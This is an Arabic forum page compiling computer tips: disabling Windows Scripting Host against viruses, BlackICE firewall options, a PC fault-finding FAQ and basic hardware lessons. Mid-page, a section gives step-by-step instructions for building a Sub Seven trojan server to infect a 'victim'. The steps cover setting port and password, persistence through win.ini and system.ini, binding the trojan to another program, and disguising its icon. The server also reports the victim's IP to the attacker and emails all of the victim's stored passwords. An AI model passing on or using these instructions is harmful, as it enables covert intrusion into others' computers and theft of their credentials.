لابد أن تقوم بفحص جميع البرامج التي تنوي تشغيلها، و كذلك جميع الأقراص التي تقوم شرائها قبل أن تشغّلها.
رابعاُ غلق البوابات الخلفية للفيروسات داخل نظام تشغيل ويندوز:-

نظام تشغيل النوافذ به بعض البوابات الخلفية التي يمكن أن تخترقها الفيروسات من هذه الأبواب تقنية تسمى Windows Scripting Host ويطلق عليها اختصارا WSH فإذا لم تسمع عنها من قبل فيجب أن تقرأ هذا الموضوع بعناية .

الفيروسات الشهيرة مثل فيروس الحب I Love You وفيروس الحب الجديد New Love استغلت هذا الباب لكي تقتحم حاسبات ملاين المستخدمين وتصيبها بأعطال خطيرة .

تقنية WHS تستخدم لكي تسمح لصفحات مواقع الإنترنت بأن تقوم بتشغيل برامج على حاسبات المستخدمين بدون تداخل منهم ومادام قد تم السماح بهذه الخصية فيمكن لصفحات الإنترنت التي تحمل فيروسات أن يتم تشغيلها على الحاسب بنفس الطريقة التي يتم بها تشغيل البرنامج العادي . خاصية WSH اختيارية ويمكن للمستخدم أن يلغيها وبذلك يحمى نفسه من الباب الخلفي لدخول الفيروسات ولكن ليست كل وجود هذا التقنية سيئة فهي لم تخترع لكي تصيب حاسباتنا بالفيروسات ولكن لها فوائد أخرى متعددة ولذلك علينا أن نقارن بين فوائدها وعيوبها وبعد ذلك نقرر هل من الأفضل إلغاؤها أم تركها.

ميزات إلغاء WHS

إلغاء هذه الخصية سيمنع صفحات الإنترنت التي تحمل فيروسات مثل فيروس الحب من العمل . وبذلك لن تتمكن من إلحاق الضرر بحاسبك . وبذلك تصبح ملفاتك في مأمن من الإصابة بهذه الفيروسات الخطيرة . أيضا لن يقوم حاسبك بإرسال نسخة من الفيروسات لحاسبات أصدقائك الذي تراسلهم عن طريق البريد الإلكتروني .

إلغاء هذه التقنية ليس له تأثير سريع ومباشر على حاسباتنا فالحاسب سيستمر في العمل بطريقة طبيعية .

برامج المجموعة المكتبية office وبرنامج الاكسبلور لتصفح الإنترنت لا تستخدم هذه التقنية ولذا فان إلغاء هذه الخصية لا يؤثر على استخدام هذه البرامج.

عيوب إلغاء WHS

بعض البرامج الأخرى غير التي ذكرت قد تستخدم هذه الخصية ولو قمنا بإلغائها فقد يؤثر ذلك على الطريقة التي تعمل بها هذه البرامج وللأسف لا توجد طريقة تخبرنا عن هذه البرامج والتطبيقات التي توجد على الحاسب .ولكن يمكنا القول أن أغلبية البرامج لا تستخدمها .

خطوات إيقاف هذه الخاصية:-

نظام نوافذ 98

- من قائمة البداية اضغط على settings

- اختار التعامل مع لوحة التحكم control panel

- افتح أيقونة Add/remove Programs

- اختار التعامل مع وظيفة windows Setup

- اضغط على مجموعة accessories ثم اضغط على مفتاح details

- الغ العلامة الموضوعة أمام خاصية windows Scripting Host

- اضغط مفتاح ok لتأكيد الاختيار.

نظام نوافذ 2000

- افتح أيقونة حاسبك myComputer والتي توجد على شاشة سطح المكتب.

- من قائمة الأدوات tools اضغط على اختيارات المجلدات folder Option

- اضغط على وظيفة أنواع الملفات File Types .

- ابحث عن VBScript Script File وقم بإلغائه

- اضغط ok لتأكيد الاختيار.




ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ

ـــــــــــــــــــــــــــــــــــــــــــــــــ



أهم البرامج وشرحها:-





يعتبر برنامج BLACK ICE من اقوى برامج الجدران النارية للحماية من المخترقين و يتميز بفاعليته العالية و كذلك عدم التحميل على الجهاز حيث لا يحجز الكثير من مصادر الجهاز و فيما يلى نشرح خصائص هذا البرنامج الرائع.

اولاً : بعض النقاط فى تنصيب البرنامج







ثانياً : شرح اعدادات البرنامج

الانتهاء من التنصيب يظهر البرنامج كما ترون فى مسطرة الجهاز و يمكنك الدخول لاعدادات البرنامج بالوقوف عليه بالفارة و الضغط على الزر الايمن بها فتظهر لك خيارات البرنامج كما فى هذه الصورة































Stop BlackIce Engine : ايقاف عمل الجدار النارى .
Stop BlackIce Application Protection : ايقاف عمل حماية البرامج .

WWW.ISS.NET : زيارة موقع الشركة .

EXIT : اغلاق البرنامج .

اعداد سيرفر الصب سيفن::-
1- بعد تحميل البرنامج قم بالضغط على ملف Edit server سوف تظهر لك شاشة فيها خيارين أضغط على الخيار run in normal mode 2- وبعد ذلك سوف تظهر لك شاشة فيها خيارات كثيرة إضغط المهم أمام كلمة port أكتب البورت 27444 وأمام كلمت password أكتب الباسوورد الي تبيه ولازم تكون عارفه وحافظه علشان راح يطلبه منك لمن تريد تخترق الضحية وأمام كلمة re-enter password أعد كتابت الباسوورد أما أمام كلمة victim name خلها زي ماهي وأمام كلمة protect password أكتب أي باسوورد وما في مشكلة لو كان نفس الباسوورد الاول بل يستحسن يكون نفسه وتحتها طبعا أعد كتابة الباسوورد امام كلمة melt server after installation ضع علامة صح امامها 2- إنتقل الي الخيار startup methods وضع علامة صح أمام الجملتين win.ini و system.ini 3- أنتقل الي الخيار notifications وأضغط علىadd icq notify واكتب رقم الاي إس كيو الخاص بك لكي تضيفه الي الاي سي كيو أو إضغط على كلمة add e-mail notify وأكتب أيميلك علشان يرسل رساله كل ما يدخل الضحية على الانترنت ويخبرك بها بال<ip> والبورت 4- أنتقل الي الخيار binded files واضغط على الجملة add executed file وأدمج السيرفر مع الملف الي تبيه 5- أنتقل الي الخيار e-mail وأمام كلمة e-mail all passwords to أكتب إيميلك علشان يرسل رساله كل ما يدخل الضحية على الانترنت فيها كل الباسووردات المسجلة في جهاز الضحية 6- أنتقل الي الخيار exe icon/other وضع علامة صح امام الجملة change server icon وأختر شكل الايقونة الي تريدها وأضغط عليها وأخيرا أضغط على save as... وضع السيرفر في أي موقع في الجهاز ولكم خااااااااااالص الشكررررررررر

المرجع الكامل لصيانة الحاسب:-





- تنبعث رائحة شياط من الشاشة ما السبب ؟
ج: الغبار يسبب احيانا اعاقة التوصيلات بين دوائر الفولت العالى داخل الشاشة
ربما تتسبب فى تلف الدوائر الكهربية ( خلى بالك من الضمان )
2- الصورة تهتز او تنكمش فجاة؟
ج: المشكلة غالبا هى التدخل الكهربائى
افصل بين مقبس الشاشة وبين اى مقابس لاجهزة اخرى مثبتة فى نفس المشترك
3- الهارد ديسك بيخروش بصوت عالى ؟
ج: اخنبر كابل الطاقة المتصل بالقرص الصلب
اذا كان سليما , اعلم ان محرك مشغل القرص الصلب يتلف عليك تغيير المشغل
4- الهارد بيزن بصوت عالى قوى ؟
ج: ( ربنا يعوضك عليك !!! )
روؤس القراءة والكتابة اخترقت سطح القرص . لاحل سوى شراء مشغل جديد للقرص الصلب
5- الجهاز فقد الوقت والتاريخ الصحيح ؟
ج: فرغت بطارية ( CMOS ) استبدلها واعد ضبط الوقت والتاريخ وتجهيزات
القرص من شاشة BIOS
6- التجهيزات تبقى لايام واسابيع ثم تتغير ؟
ج: استبدل بطارية CMOS . فاذا لم تحل المشكلة اذهب الى مهندس الكمبيوتر
كى يفحص الدائرة الكهربية للوحة الام و التاكن من انها تنقل الاشارات بشكل
سليم.
لاحظ ان:
********
اذا كانت تجهيزات ال CMOS تضيع عند اطفاء الجهاز والبطارية جديدة
فذاكرة CMOS هى السبب استبدلها
7- تظهر رسالة General Failure Reading Drive C ?
الهارد تلف ( برضه الله يعوض عليك ):
او على وشك ان يتلف .؟ بامكانك التحفيز من القرص المرن ثم تشغيل اداة
SCANDISK لتصليح المشكلة .اذا نجحت ( وكانت امك دعيالك ) قم فورا بنسخ
بياناتك الى اى هارد اخر.
8- تظهر رسالة خطا تشير الى مشكلة فى الذاكرة ؟
ج: تاكد ان RDRAM و SDRAM من نوع واحد وسرعة واحدة
(ان شاء الله هشرح ال RDRAM و SDRAM فى موضوع مستقل )
9- تظهر هذا الارقام 4XX.5XX.24XX.74XX او 6XX ?
ج: مشكلة فى مشغل القرص المرن . جرب ان تزيل المشغل من شاشة BIOS
ثم اعد التحفيز BOOTING.
10- تظهر هذه الارقام 9XX ?
ج: مشكلة فى المنفذ المتوازى.اذهب الى BIOS و اختر EPS لمنفذك المتوازى
11- يظهر الرقم 1702 ?
ج: خطا فى التحكم فى القرص الصلب. اذهب الى BIOS و احتر AUTO لتجهيز
القرص الصلب
12- الجهاز يعيد التحفيز عند الدخول او الخروج من الويندوز ؟
ج: درجة حرارة ال CPU ( وحدة المعالجة المركزية ) مرتفعة , خاصة اذا كنت قد
غيرت ساعتها . استبدل المروحة الصغيرة المثبتة عليها. وتاكد ان فتحات المروحة
الكبيرة مفتوحة.
13- الجهاز ينطفئ تلقائيا بعد فترة ؟
ج: قد يكون الحمل زائد على مصدر الطاقة . جرب ان تخلع فيشات بعض الكروت
او وحدات التشغيل .
لكن جهازك سليم ومفيهوش حاجة ( ابسط يا عم وهات لناسندوتش لحمة وحاجة
ساقعة بس بلاش COCA COLA & PEPSI
علشان المقاطعة ) وان كان هناك مشكلة تكون من البرمجيات SOFTWARE
14- لقد عانيت من مشكلات اخرى فى القرص الصلب مؤخرا ؟
ج: حاملات المشغل او روؤس القراءة و الكتابة الموجودة على قرصك الصلب قد
تلفت . اذا كان لديك قرص SCSI يمكنك ان تطيل عمر المشغل قليلا بان تحزم كل
شئ Backup ثم تقوم بعمل تشكيل من نوع low-level format .
( طبعا محدش فاهم حاجة معلهش .اصبر ع جار السوء يا يرحل يا تجيله مصيبة
تاخده.
كل الحاجات دى ان شاء الله لها مواضيع خاصة بيها قريبا جدا ان شاء الله )
15-الشاشة تصدر صوت متقطع متكرر ؟
ج: هناك مشكلة فى الدوائر الكهربية للشاشة ...... راجع الضمان
16- الجهاز يصدر صفارة 1 طويلة و 2 قصيرة عند بداية التشغيل ؟
ج: كارت ال VGA ( الرسوميات ) غير مثبت فى مكانه . قم بنزعه وتركيبه مرة اخرى
فاذا ظلت الصفارة قم بتحديث برامج التشغيل . فاذا لم ينفع كل ذلك فيجب ان
تشترى كارت جديد
17- صفارة 1 طويلة و 1 قصيرة ثم 3 قصيرة ؟
ج: بطارية ال CMOS فرغت عليك استبدالها
18- 1 طويلة و 1 قصيرة ثم 4 قصيرة ؟
ج: ستحتاج الى اعادة تثبيت ال BIOS او تغيير BOIS EPROM
وقد تكون مشكلة فى التحكم فى لوحة المفاتيح. اختبر الفيشة وتاكد من انها
مثبتة جيدا وغير تالفة.
19- صفارة متقطعة ؟
ج: اعد تثبيت ال RAM
20- فى بداية التشغيل الجهاز لا يصدر اى صوت ؟
ج: مبروووووووووووووووووووك الجهاز دخل فى بيات شتوى الى مالانهاية
ومن الافضل انك تعمله صندوق لكتبك القديمة
لكن
******
قم بفك جميع اجزاء الجهاز ثم قم بتركيبها مرة اخرى ممكن ان الجهاز يشتغل
تانى وربنا معاك
21- تظهر رسالة DISK FAILURE INSERT SYSTEM DISK AND THEN PRESS ENTER ?
ج: اولا تحقق من كابلات ال DATA و ال POWER للهارد ديسك
اذا استمرت الرسالة قم بتنزيل ويندوز جديدة
استمر الحال كما هو عليه
الهارد تلف ويجب ان تشترى هارد جديد
22- الجهاز يفتح ب safe mode ؟
ج: هناك مشكلة , لذلك دخل الويندوز عن طريق الوضع الامن . قم بحذف اخر
برامج قمت بتنزيلها . واعمل scandisk
ث اعمل restart. وعندما يبدا الجهاز فى الفتح اضغط بتكرار ع F8 وبالراحة
علشان متكسرش لوحة المفاتيح
واختر NORMAL اى طبيعى
23- هل صحيح ان المعالج (CPU) اذا زادت درجة حرارته يتحرق ؟
ج: لا . لان المعالج مصمم كى يتوقف عن العمل اذا بلغ درجة حرارة معينة
لذلك تجد الجهاز يهنج اى يعمل HANGUP
24-تعطل التشغيل التلقائى لل CD-ROOM ?
ج: لاعادة التشغيل التلقائى افتح
كليك يمين ل MY COMPUTER واختر PROPERTIES
ثم DEVICE MANAGER واختر CD-ROOM
اضغط PROPERTIES ثم SETTINGS
ثم ضع علامة امام الخيار AUTOINSERT NOTIFICATION
ورغم ذلك هناك بعض الاسطوانات تصر على عدم التشغيل تلقائيا.
25- الجهاز يقرا الاسطوانة بعد ادخالها و اخراجها عدة مرات ؟
ج: هناك عيب فى ال CD-ROOM لانه احيانا يغطى التراب و الغبار عدسة الجهاز
مما يعوقها عن التعرف ع الاسطوانة. يجب ان يقوم متخصص بفتحها
26- درج ال CD-ROOM لا يفتح ولا يغلق ؟
ج: يحث هذا لان درج الجهاز قد انبعج او انكسر . ويحدث هذا اذا ضغطت او
استندت على درج المشغل وهو مفتوح .

الأجهزة والبرامج :

1-الأجهزة : وهي أي قطعة أو جزء منا لحاسب يمكن رؤيته بالعين أو لمسه باليد .
2-البرامج : هي مجموعة من التعليمات الإلكترونية تقوم بإعطاء الأوامر للجهاز .
تعريف الحاسب الشخصي :
هو تجميع كبير لعدد من المفاتيح الإلكترونية وتستخدم هذه المفاتيح في تنظيم ما يسمى بالأرقام الثنائية ( 1 أو 0 ) . وقد أصدرت شركة أي بي ام أول حاسب شخصي لها عام 1975 ويسمى باسم موديل 5100 .
الأنظمة المختلفة للحسابات الشخصية :
يوجد عدة أنمة من الحاسبات الشخصية ويتم تمييزها عن بعضها بعدة عناصر ومنها المعالج .
الأجزاء الخارجية لنموذج حاسب شخصي :
•الصندوق الرئيسي : وهو صندوق مصنوع من البلاستيك المقوى أو المعدن ويحتوي على جميع المكونات الداخلية للحاسب .
•لوحة المفاتيح : وهي وسيلة الاتصال بالحاسب والتي يمكن من خلالها إدخال الأوامر والتعليمات للحاسب .
•الفارة : وهي عبارة عن وسيلة إدخال للحاسب تعتمد على حركة كرة تحدد اتجاه مؤشر على الشاشة .
•الشاشة : وهي وسيلة إظهار البيانات والمعلومات والرسومات .
•السماعات الخارجية : وهي سماعات خارجية تستخدم للاستماع للملفات الصوتية .

أنواع الحاسبات :
1-الحاسب الرقمي وهو الحاسب الشخصي .
2-الحاسب العلمي ( له عمل ثابت ) مثل حاسب قياسات درجات الحرارة .
3-الحاسب التمثيلي ( الهجين )( 1+2 ) مثل أجهزة الفضاء والدراسات العلمية .

المكونات الداخلية للحاسب :
•اللوحة الأم .
•وحدة الإمداد بالطاقة .
•كيابل لنقل الطاقة ولنقل البيانات .
•كروت صوت وشاشة وغيرها .
•المشغلات وأدوات التخزين .
•المعالج والذاكرة .
•البطارية .

الفصل الثاني : كيف يعمل الحاسب؟
-------------------------------------------
طريقة عمل الحاسب :
-يقوم المستخدم بإدخال البيانات أو الأوامر عبر أجهزة إدخال مثل لوحة المفاتيح .
-بعد ذلك تدخل هذه الأوامر عبر وسائل نقل للبيانات تسمى الكيابل إلى مراكز المعالجة
-تقوم الذاكرة المؤقتة والمعالج بعمل معالجة للحصول على النتائج المطلوبة .
-بعد ذلك تنتقل هذه المعلومات أو النتائج إلى وحدات الإخراج أو التخزين عبر ناقل البيانات ومن أمثلة وحدات الإخراج الشاشة ومن أمثلة وحدات التخزين القرص الصلب

وحدات الإدخال :
لكي يعمل الحاسب الآلي ويحقق الفائدة المطلوبة لابد من وجود وحدات أو أدوات تقوم بإرسال الأوامر إلى وحدات المعالجة وهذه تسمى بوحدات الإدخال .
(1) الماوس ( الفارة ) :
وهي وحدة تحكم وإدخال تستخدم لتحريك مؤشر الشاشة وتستخدم لتنفيذ أحد الخيارات المتاحة .
مكونات الفارة :
•العلبة : وهي السقف العلوي للماوس لتحديد موضع اليد .
•الكرة الدوارة : وهي التي تصل من خلالها الحركة لمجسمات التحديد .
•كابل : وهو وسيلة نقل الأوامر إلى مركز المعالجة .
أنواع الماوس :
• NORMAL
• SCROLL MOUSE
•اللاسلكية .
•اللمس .

أنواع المنافذ المستخدمة مع الفارة :
SERIAL-USB-PS2
صيانة وإصلاح أعطال الفارة :
العطل : مؤشر الفارة لا يعمل .
السبب : فصل أو عدم تركيب كابل الفارة ـ عطل في الماوس .
الإجراء :
التأكد من تركيب الكابل ثم إعادة تشغيل الجهاز .
تنظيف الماوس وذلك بإزالة الغبار العالق بها من جهة الكرة .

(2) لوحة المفاتيح :
تستخدم لوحة المفاتيح لكتابة التعليمات للحاسب ولإدخال البيانات المطلوبة تشغيلها على الحاسب .
مكونات لوحة المفاتيح :
•تتكون لوحة المفاتيح من 101 ـ 102 مفتاح وهذه اللوحة تعتبر محسنة عن ما سبق من لوحات المفاتيح ذات الـ 83 مفتاح .
•كابل لنقل الأوامر إلى لوحة المعالجة .
أنواع لوحة المفاتيح :
لوحة المفاتيح ذات 101 ـ 102 مفتاح .
ولوحة المفاتيح MULIMEDIA
أنواع المنافذ المستخدمة :
USP-SERIAL-PS2
صيانة وإصلاح أعطال لوحة المفاتيح :
العطل : بعض / كل مفاتيح اللوحة لا تعمل .
السبب : فصل أو عدم تركيب الكابل عطل في لوحة المفاتيح .
الإجراء :
التأكد من تركيب الكابل .
تنظيف المفاتيح من العوائق .

(3) من أدوات الإدخال :
القلم الضوئي .
الماسح الضوئي .
•هناك أنواع من الماسح الضوئي ومنها :
الماسحة المسطحة ـ الماسحة المحمولة .

أدوات الإخراج :
تعتبر عملية الإخراج هي ناتج عملية معالجة المدخلات .
1-الشاشة :
وهي ساحة العرض وتستخدم لرؤية العمليات الحسابية ونتائجها والرسوم والبرامج التي تكتب في الحاسب .

أنواع الشاشات :
CRT :
شاشة عرض لها شكل التلفزيون ( أنبوب شعاع المهبط ) .
LCD :
شاشات مسطحة تعتمد على مصدر الضوء الخارجي وتتكون من سطح زجاجي أو بلاستيكي وطبقة موصلة من الكرستال .

حجم الشاشة :
يقاس حجم الشاشة بالبوصة حيث يمثل طول قطر وليس الشاشة ويتراوح بين 12-21 بوصة .
درجة الوضوح :
هي كمية التفاصيل التي تبنيها الشاشة ، وتقاس بحاصل ضرب عدد النقط الأفقية في الرأسية وكلما زادت عدد النقط زاد الوضوح .
PIXELS - النقط .
أعطال الشاشة :
سنتحدث هنا عن الأعطال التي يتسبب بها الجهاز بالنسبة للشاشة مع توضيح الأعطال الخاصة بالشاشة .
العطل : توقف عمل الشاشة مع إضاءة طبيعية للمبة .
السبب : عطل في وحدة الطاقة أو الشاشة أو عطل في كابل الشاشة أو كرت الشاشة .
الإجراء :
إصلاح أو تغيير وحدة الطاقة .
تغيير كابل الشاشة .
تغيير كرت الشاشة .
العطل : توقف للشاشة مع إطفاء لمبة الشاشة .
السبب : عدم وجود أي طاقة .
الإجراء :
استبدال كابل الشاشة .
أو وحدة الطاقة .
أو عطل في الشاشة .
العطل : صورة معتمة مع وميض اللمبة .
السبب :عطل في الشاشة أو كرت الشاشة .
الإجراء :
أغلف الجهاز إذاً وشغل الشاشة إذا ظهرت الشاشة بدون اهتزاز فالمشكلة من الكرت والعكس .
العطل : عدم القدرة على ضبط الألوان أو درجة الوضوح .
السبب : عطل في الشاشة أو الكرت .
الإجراء :
استبدل كرت الشاشة إذا تكررت المشكلة فالمشكلة من الشاشة .
العطل : عدم تواجد الألوان الأساسية .
السبب : تواجد محيط مغناطيسي .
الإجراء :
غير مكان الشاشة .
العطل : ألوان الشاشة غير سليمة .
السبب : الكابل أو الشاشة .
الإجراء :
استبدل الكابل .
ملاحظة :
_ يفضل تنظيف سطح الشاشة دائماً وتغطيتها بالكيس الواقي من الغبار عند الانتهاء من العمل .
- يفضل وضع الواقي من إشعاع الشاشة .

2-الطابعات :
هناك ثلاثة أنواع من الطابعات :
& الحبرية .
& النقطية .
& الليزر .
اختيار الطابعة المناسبة :
•أسعار الطابعة .
•أسعار مواد الطابعة .
•أحجام الورق التي يحتاجها المستخدم وأنواعه .
•توافقها مع البرامج التي يستخدمها المستخدم .
•حجم صندوق الورق الخاص بالطابعة .
•سرعة الطابعة .
•لماذا يحتاجها المستخدم لأي نوع من الاستخدامات .
•معرفة عمر الطابعة الافتراضي وأيضاً عمر مواد الطابعة الافتراضي .
•دقة الطابعة .

صيانة الطابعات :
العطل : طبع معلومات غير مفهومة .
السبب : تركيب غير سليم لكابل الطابعة أو تعريف غير سليم للطابعة .
الإجراء :
تركيب الكيابل بطريقة سليمة .
إعادة تعريف الطابعة .
تظهر بعض المشاكل نتيجة عدم وجود ورق أو حبر في الطابعة .

ملاحظة :
يفضل عمل تنظيف للطابعة بطريقتين :
# مسح الطابعة من الداخل بشريط ناشف وهناك مادة تنظف بها الطابعة من الداخل .
# عمل تنظيف من برنامج التنظيف المرفق مع برنامج الطابعة ثم طباعة صفحة الاختبار

الفصل الثالث : عمليات المعالجه
----------------------------------------

CPU
تتم عملية المعالجة من خلال وحدة المعالجة المركزية وتعتبر أهم شريحة داخل جهاز الكمبيوتر وهناك عدة عوامل تحدد نوعية أداء وحدة المعالجة المركزية .
الشركات المصنعة :
INTEL
AMD
SYRIX
MOTOROLA
IBM
السرعة :
تتوفر وحدة المعالجة المركزية بسرعات مختلفة تبعاً للنظام المستخدم مثل :
PI\PII\PIII…
وتدل على نوعية المعالج المستخدم بسرعات مختلفة .
أنواع الذاكرة :
تختلف الذاكرة المستخدمة في المعالج عن الذاكرة المؤقتة وغيرها في الجهاز .
CASHE MEMORY
وهي ذاكرة مخفاة تقوم بزيادة سرعة المعالج وتنقسم إلى ثلاثة أنواع :
128 CASH MEMORY
256 CASH MEMORY
512 CASH MEMORY K.B

أنواع المعالجات :
1-386 :
لها ناقل بيانات خارجي .
عدد الملامسات 132 بن .
تستهلك 400 ميللي أمبير .
سرعتها تتراوح ما بين 16-33 ميجا هيرتز .
2-486 :
لها ناقل بيانات خارجي .
وجود معالج حسابي داخل المعالج لأداء العمليات الحسابية .
وجود ذاكرة مخفاة بسعة 16 ك .

3-معالجات البنتيوم :
أعلنت شركة انتل في عام 1992 عن ظهور الجيل الجديد من المعالجات وظهر أو حاسب يحمل هذا المعالج عام 1993 ويتوافق معالج البنتيوم مع أنظمة انتل .

مميزات البنتيوم :
له عدد 2 من خطوط البيانات التي تنفذ أكثر من عملية في نفس الوقت .
وجود مترجم جديد .
يتبع البنتيوم تكنولوجيا خاصة بتقليل زمن البحث في الذاكرة .
يوجد بها ذاكرة مخفاة عالية القوة والسرعة .

بنتيوم 1 :
سرعاته 90-200 ميجاهيرتز .
يستهلك تيار كهربائي يتراوح ما بين 3.25-4.7 أمبير .
296 بن .
وهناك نوعان من هذا النظام :
MMX
ظهر سنة 1997 .
321 بن .
يعمل بـ 2.8 فولت .
PRO
ظهر سنة 1995 وانتشر سنة 1996 .
378 بن .
يعمل بـ 3.3 فولت .

بنتيوم 2 :
يعتبر واحد من أحدث أنواع المعالجات وقد ظهر عام 1997 .
سرعاته : 233-266-300-333 وصولاً إلى 450 ميجا هيرتز .
يحتوي على 378 بن .
يعمل على 2.8 فولت .

ثم ظهر بعد ذلك نظام البنتيوم 3 و 4 اللذان يقومان بنفس نظام البنتيوم 2 مع زيادة في سرعات المعالج .
بنتيوم 3:
سرعاته : 500 – 1100 .
بنتيوم 4 :
سرعاته : 1300 – 2000 ميجا هيرتز .
أشكال المعالجات :
لدينا نوعين من أشكال المعالجات :
SLOT-SOCKET
العملية التي تحدث داخل المعالج :
1-عند إدخال البيانات عن طريقة أدوات الإدخال .
2-ينقسم المعالج في هذه اللحظة إلى ثلاث مراحل :
وحدة التحكم – وحدة الحساب والمنطق – تسجيل النتيجة .
كمثال :
3 + 5 :

طريقة تركيب المعالج :
يتم تركيب المعالج في المكان المخصص له ثم يتم تركيب مروحة التبريد الخاصة به ومن ثم يتم وصل المروحة في اللوحة الأم لوصلها بالتيار الكهربائي .
اختبار المعالجات :
بعد تركيب المعالج يجب التأكد من أن المروحة التي عليه تعمل بشكل صحيح .
إذا ظهر أن درجة حرارة المعالج مرتفعة بشكل كبير يجب استبداله وإرسال المستبدل إلى الشركات المصنعة لهذا المعالج .

أعطال المعالج :
العطل : الحاسب لا يعمل بصورة سليمة بعد تغيير المعالج .
السبب : عدم تعريف المعالج .
الإجراء :
فك البطارية وإعادة تركيبها – SETUP

العطل : سماع أصوات غريبة بعد تركيب المعالج .
السبب : عطل في المعالج .
الإجراء :
استبدال المعالج .

العطل : عدم ظهور شيء على الشاشة احتى بعد التأكد من صلاحية كرت الشاشة والذاكرة المؤقتة .
السبب : عطل في المعالج .
الإجراء :
استبدال المعالج

F_DISC [/color]

https://nets.ahlamontada.com

الرجوع الى أعلى الصفحة  رسالة [صفحة 1 من اصل 1]

صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى